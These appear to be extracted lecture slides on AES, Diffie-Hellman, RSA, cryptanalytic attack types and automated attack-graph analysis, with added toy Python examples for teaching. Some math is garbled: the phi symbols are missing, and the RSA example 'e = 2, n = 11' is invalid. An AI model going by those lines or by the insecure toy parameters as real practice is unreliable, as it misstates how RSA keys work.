◦ Mix columns
◦ Add round key
Stage 1: substitute bytes
AES computes a matrix which maps every 8-bit value to a different 8-bit value
Computed using properties of finite fields (go take some math classes to learn more about this)
Stage 2: permute
Stage 3: Mix columns
Here, the 4 bytes in each column are combined using a linear transformation
Stage 4: Add round key
Public Key Cryptography
First revolution in cryptography in hundreds of years
Originally introduced in 1976 “New directions in cryptography” by Diffie and Hellman
Public/Private Keys
Each user has two related keys
◦ one public and one private.
All public keys are distributed freely. Private key belongs only to user.
To ensure confidentiality: encrypt outgoing message using receiver's public key.
Basic operations
Logarithms: defined as the exponent to which a fixed number, the base, must be raised in order to produce that number
Examples:
◦ $\log_3 9 = 2$, since $3^2 = 9$
◦ $\log_{10} 1000 = 3$, since $10^3 = 1000$
◦ $\log_2 64 = 6$, since $2^6 = 64$
Basic operations (cont)
Modulo operation: taking remainders
a mod b = remainder when a is divided by b
Examples:
◦ 1 mod 3 = 1
◦ 15 mod 10 = 5
◦ 256 mod 2 = 0
Public and private keys
First, choose X, a secret key
Then choose Q = a prime number, and A = some other number
Set $Y = A^X \bmod Q$
Public and private keys
Now publish Y, A, and Q, but keep X secret
Anyone knows that $X = \log_A Y \bmod Q$, but this is difficult to compute!
This is called the discrete logarithm problem - very similar to factoring in terms of difficulty, so no polynomial time algorithm is known.
Essentially, computing Y given X is easy, but computing X given Y is much harder.
(Go take number theory.)
How to encrypt
So I know X, Y, A, and Q (but you don’t know X).
You get your own X’, and then tell me $Y' = A^{X'} \bmod Q$
We can now compute our own secret key (and use it for AES or some other algorithm)
◦ I will compute $(Y')^X \bmod Q = (A^{X'})^X \bmod Q$
◦ You compute $Y^{X'} \bmod Q = (A^X)^{X'} \bmod Q$
These are equal! But an eavesdropper can’t compute them, since they don’t have X or X’
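The key agreement above with the slides' symbols (X, Y, A, Q), as an added example (not code from the original slides). The prime 2^127 - 1, the base 3, the range check on the received value and the SHA-256 step that turns the shared number into a 32-byte key are assumptions for illustration; the parameters are toy-sized.

```python
import hashlib
import secrets

Q = 2**127 - 1   # assumption: a known prime, far too small for real use
A = 3            # assumption: public base


def keypair(a=A, q=Q):
    """Pick a secret X and compute the public Y = A^X mod Q."""
    x = secrets.randbelow(q - 3) + 2          # X in 2 .. Q-2
    return x, pow(a, x, q)


def shared_secret(their_y, my_x, q=Q):
    """(Y')^X mod Q. Degenerate values would force a predictable result."""
    if not 2 <= their_y <= q - 2:
        raise ValueError("received public value is out of range")
    return pow(their_y, my_x, q)


def derive_key(secret, q=Q):
    """Turn the shared number into 32 bytes usable as an AES-256 key."""
    raw = secret.to_bytes((q.bit_length() + 7) // 8, "big")
    return hashlib.sha256(raw).digest()


def rejects(their_y, q=Q):
    """True if shared_secret refuses this received value."""
    try:
        shared_secret(their_y, 5, q)
    except ValueError:
        return True
    return False


def discrete_log_by_search(a, y, q):
    """Recover X from Y = A^X mod Q by trying every exponent.
    The loop runs up to Q-1 times, which is why Q must be enormous."""
    for x in range(1, q):
        if pow(a, x, q) == y:
            return x
    return None


def exchange():
    """Both sides of one exchange; returns the two independently derived keys."""
    x, y = keypair()           # me
    x2, y2 = keypair()         # you
    return derive_key(shared_secret(y2, x)), derive_key(shared_secret(y, x2))


if __name__ == "__main__":
    mine, yours = exchange()
    print("keys match:", mine == yours)
    # Tiny constructed numbers: Q = 23, A = 5, X = 6, X' = 15.
    print("Y  =", pow(5, 6, 23), " Y' =", pow(5, 15, 23))
    print("eavesdropper recovers X =", discrete_log_by_search(5, pow(5, 6, 23), 23))
```

With Q = 23 the eavesdropper's search finishes instantly; the exchange is only as strong as that search is long.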
Attacks
One downside: this is less secure than pure symmetric encryption
There are ways to attack this that do better than brute force
Number theory and group theory allow theoretical attacks that are provably better than exponential, but worse than polynomial time
So it is NOT known if this problem is really hard! Someone could
RSA
In 1977, Rivest, Shamir, and Adleman came up with another way to use public key cryptography Rather than secure key exchanges, this one actually lets you encrypt whole messages
How RSA works
Choose 2 prime numbers, p and q
n = pq
(x) = # numbers less than x and relatively prime to x ◦ (That means numbers which have no common divisors.)
Note (n) = (p) (q) ◦ What is (p)? (q)?
RSA (cont.)
(n) = (p-1)(q-1)
• Hard to find if you don’t know p and q … easy if you do.
Pick any e > 1, relatively prime to (n) . This is your public key. Compute d, such that de = 1 mod (n). This is your private key.
◦ Example: Suppose e = 2, n = 11.
Encrypting with RSA
Suppose I have a message m, as well as e and n. I compute c = m^e mod n, and send it to you.
You have d.
You can compute c^d mod n = (m^e)^d mod n = m^1 mod n. For an attacker, without d, this is not easy!
Ciphers
Public/Private Keys: Other uses
Digital signature
Data that is appended to a message, made from the message itself and the sender's private key, to ensure the authenticity of the
message
Digital certificate
A representation of a sender's authenticated public key used to minimize malicious forgeries
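The RSA steps from "How RSA works" and "Encrypting with RSA", together with the digital signature described above, as an added example that is not part of the original slides. The primes 61 and 53, e = 17, the hashing step and all function names are constructed for illustration; this is unpadded textbook RSA, whereas real systems use large primes and padding schemes such as OAEP and PSS.

```python
import hashlib
from math import gcd

def make_keys(p, q, e):
    """Return ((e, n), (d, n)) for primes p, q and public exponent e."""
    n = p * q
    phi = (p - 1) * (q - 1)      # count of numbers below n relatively prime to n
    if e <= 1 or gcd(e, phi) != 1:
        # Any even e fails this check: (p-1)(q-1) is even for odd primes.
        raise ValueError("e must be > 1 and relatively prime to (p-1)(q-1)")
    d = pow(e, -1, phi)          # d*e = 1 mod (p-1)(q-1); needs Python 3.8+
    return (e, n), (d, n)

def encrypt(m, public):
    e, n = public
    if not 0 <= m < n:
        raise ValueError("message must be an integer in [0, n)")
    return pow(m, e, n)          # c = m^e mod n

def decrypt(c, private):
    d, n = private
    return pow(c, d, n)          # c^d mod n = m

def digest(message, n):
    """SHA-256 of the message reduced below n (toy stand-in for real padding)."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n

def sign(message, private):
    d, n = private
    return pow(digest(message, n), d, n)   # needs the sender's private key

def verify(message, signature, public):
    e, n = public
    return pow(signature, e, n) == digest(message, n)

# Constructed toy parameters.
PUBLIC, PRIVATE = make_keys(61, 53, 17)

if __name__ == "__main__":
    c = encrypt(65, PUBLIC)
    print(c, decrypt(c, PRIVATE))
    sig = sign(b"pay 10", PRIVATE)
    print(verify(b"pay 10", sig, PUBLIC))
```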
Main types of cryptanalytic attack
1. Cryptotexts-only attack: The cryptanalysts get cryptotexts
c_1 = e_k(w_1), …, c_n = e_k(w_n) and try to infer the key k or as many of the plaintexts w_1, …, w_n as possible.
2. Known-plaintexts attack
The cryptanalysts know some pairs (w_i, e_k(w_i)), 1 ≤ i ≤ n, and try to infer k, or at least w_{n+1} for a new cryptotext e_k(w_{n+1}).
3. Chosen-plaintexts attack
Main types of cryptanalytic attack
4. Known-encryption-algorithm attack
The encryption algorithm e_k is given and the cryptanalysts try to get the decryption algorithm d_k.
5. Chosen-cryptotext attack
The cryptanalysts know some pairs
(c_i, d_k(c_i)), 1 ≤ i ≤ n,
where the cryptotexts c_i have been chosen by the cryptanalysts. The aim is to determine the key. (For example, if cryptanalysts get temporary access to decryption machinery.)
Summary
Cryptography
Attack Graph
An attack graph is a data structure used to represent all possible attacks on a network
Example of Attack Graph Developed by a Professional Red Team
Problem Statement
Problem: Generating attack graphs by hand is tedious, error-prone, and impractical for large systems.
Goal: Automate the generation and analysis of attack graphs.
◦ Generation
  ◦ Must be fast and completely automatic
  ◦ Must handle large, realistic examples
  ◦ Should guarantee properties of attack graphs
◦ Analysis
  ◦ Must enable security analysis by system administrators
  ◦ Should support incremental, partial specification
Automated Generation Procedure
XML spec for: network, vulnerability, connections, safety property…
NuSMV: a symbolic model checker; a modified version is used to automatically produce the attack graph (AG)
4 hosts, 30 actions, 138 nodes, 742 edges, 6 minutes
= Attacker gains root access to
A Graph Larger than Fits on Screen
= Attacker gains root access to Host 1.
4 hosts 30 actions
larger initial state space 310 nodes
An Illustrative Example
[Figure: network diagram showing attacker, firewall, IIS Web Server, Windows, Linux, Squid, LICQ, IDS, firewall, database]
Action Arsenal
IIS buffer overflow: remotely get root
Squid portscan: port scan
LICQ remote-to-user: gain user privileges remotely
IE scripting exploit: gain user privileges remotely
local buffer overflow: locally get root
Always Detected
Attack goal: disrupt the functioning of the database
Security Property
Attack graphs depict ways in which an intruder can force a network into an unsafe state:
Example Attack Graph
[Figure: attack scenario on the example network (attacker, firewall, IIS Web Server, Windows, Linux, Squid, LICQ, IDS, firewall, database)]
Alternative Attack Scenario avoiding IDS
[Figure: alternative attack scenario on the same example network]
Automated Analysis:
Single Action Removal
Automated Analysis:
Minimization Analyzer
What actions are necessary for the intruder to succeed?
◦ Given a fixed set of atomic attacks, not all of them may be available to the intruder
◦ Nondeterministically decide which subset of atomic attacks to choose initially
Automated Analysis:
Minimum Critical Set of Actions
A = the set of actions available to the intruder
Def 1: A set of actions C is critical if the intruder cannot achieve his goal using only actions in A \ C.
Def 2: A critical set of actions C is minimum if there is no critical action set of smaller size.
Def 3: A set of actions A’ A is realizable if the intruder can achieve his goal using only actions in A’.
Minimum Critical Set of Actions (MCSA):
◦ Given a set of actions A and an attack graph G, find ◦ a minimum critical action subset C A.
Finding a minimum set: NP-complete
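Definitions 1 to 3 applied to a small case, as an added example that is not part of the original slides or of the tool they describe. The action names come from the Action Arsenal slide, but the three attack scenarios (each the set of actions used along one attacker path) and all function names are constructed for illustration; the exhaustive search is exponential in the number of actions, consistent with the NP-completeness noted above.

```python
from itertools import combinations

# A = the set of actions available to the intruder (names from the slides)
ACTIONS = [
    "IIS buffer overflow",
    "Squid portscan",
    "LICQ remote-to-user",
    "IE scripting exploit",
    "local buffer overflow",
]

# Constructed scenarios: each set is the actions used on one path to the goal.
SCENARIOS = [
    frozenset({"IIS buffer overflow", "Squid portscan",
               "LICQ remote-to-user", "local buffer overflow"}),
    frozenset({"IIS buffer overflow", "IE scripting exploit",
               "local buffer overflow"}),
    frozenset({"Squid portscan", "LICQ remote-to-user",
               "IE scripting exploit"}),
]

def realizable(available, scenarios=SCENARIOS):
    """Def 3: the goal is reachable if some scenario uses only these actions."""
    available = set(available)
    return any(s <= available for s in scenarios)

def is_critical(c, actions=ACTIONS, scenarios=SCENARIOS):
    """Def 1: C is critical if the goal is unreachable using only A minus C."""
    return not realizable(set(actions) - set(c), scenarios)

def critical_single_actions(actions=ACTIONS, scenarios=SCENARIOS):
    """Single action removal: actions whose removal alone blocks the goal."""
    return [a for a in actions if is_critical({a}, actions, scenarios)]

def minimum_critical_sets(actions=ACTIONS, scenarios=SCENARIOS):
    """Def 2: all critical sets of the smallest size, by exhaustive search."""
    for size in range(len(actions) + 1):
        found = [frozenset(c) for c in combinations(actions, size)
                 if is_critical(c, actions, scenarios)]
        if found:
            return found
    return []

if __name__ == "__main__":
    print(critical_single_actions())
    for c in minimum_critical_sets():
        print(sorted(c))
```

For a defender, each returned set is a smallest group of atomic attacks that, if all are removed (patched, filtered or otherwise disabled), leaves no scenario available to the intruder.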
Reliability Analyzer
What is the likelihood that the intruder goes undetected?
◦ Interpret as a Markov Decision Process
◦ Assign probability for detecting each atomic attack
◦ Each attack has both detectable and stealthy variants
Probabilistic Attack Graph
Overview
[Diagram: two-phase tool pipeline]
Phase 1: System Model, Security Property; Attack Graph Generator; Attack Graph
Phase 2: Annotations
◦ Minimization Analyzer; Attack Subgraph
  Query: What actions are necessary for the intruder to succeed?
◦ Reliability Analyzer; Probabilistic Attack Graph
  Query: What is the likelihood that the intruder goes undetected?
◦ Risk Analyzer
  Query: What is the intruder’s risk of discovery during an attack?
◦ …
Limitations
Attack Graph Visualization Problem
Limitations
Scalability Problem
Too complex and difficult to use for large networks
Zero-day exploit
A zero-day (or zero-hour) attack or threat is a computer threat that tries to
exploit unknown, undisclosed or unpatched computer application vulnerabilities